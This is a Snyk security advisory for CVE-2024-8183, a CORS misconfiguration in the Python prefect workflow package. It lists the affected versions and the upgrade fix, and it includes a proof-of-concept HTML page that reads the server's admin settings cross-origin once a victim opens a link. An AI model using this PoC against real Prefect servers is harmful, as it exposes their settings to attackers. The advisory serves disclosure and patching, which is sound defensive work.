Origin Validation Error Affecting prefect package, versions [,2.20.17)[3.0.0,3.0.3)
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-PYTHON-PREFECT-9487016
- published21 Mar 2025
- disclosed20 Mar 2025
- creditsrivallikusumba
Introduced: 20 Mar 2025
NewCVE-2024-8183 (opens in a new tab)How to fix?
Upgrade prefect to version 2.20.17, 3.0.3 or higher.
Overview
prefect is a Prefect is a new workflow management system, designed for modern infrastructure and powered by the open-source Prefect Core workflow engine. Users organize Tasks into Flows, and Prefect takes care of the rest.
Affected versions of this package are vulnerable to Origin Validation Error due to a misconfiguration in the handling of CORS policies. An attacker can access sensitive data and potentially disrupt services by sending requests from unauthorized domains.
PoC
- Create
cors.htmlon attacker server:
<!DOCTYPE html>
<html>
<head>
<title>CORS PoC</title>
</head>
<body>
<h1>CORS PoC</h1>
<script>
fetch('http://127.0.0.1:4200/api/admin/settings', {
method: 'GET',
headers: {
'Origin': 'http://malicious-site.com'
}
})
.then(response => response.text()) // Convert the response to text
.then(data => {
alert('CORS PoC Response:\n' + data); // Alert the entire response
})
.catch(error => {
alert('CORS PoC Error:\n' + error); // Alert any error that occurs
});
</script>
</body>
</html>
- Host it, and send the link, as soon as victim will click on that link, the data will be popped up as alert(demo).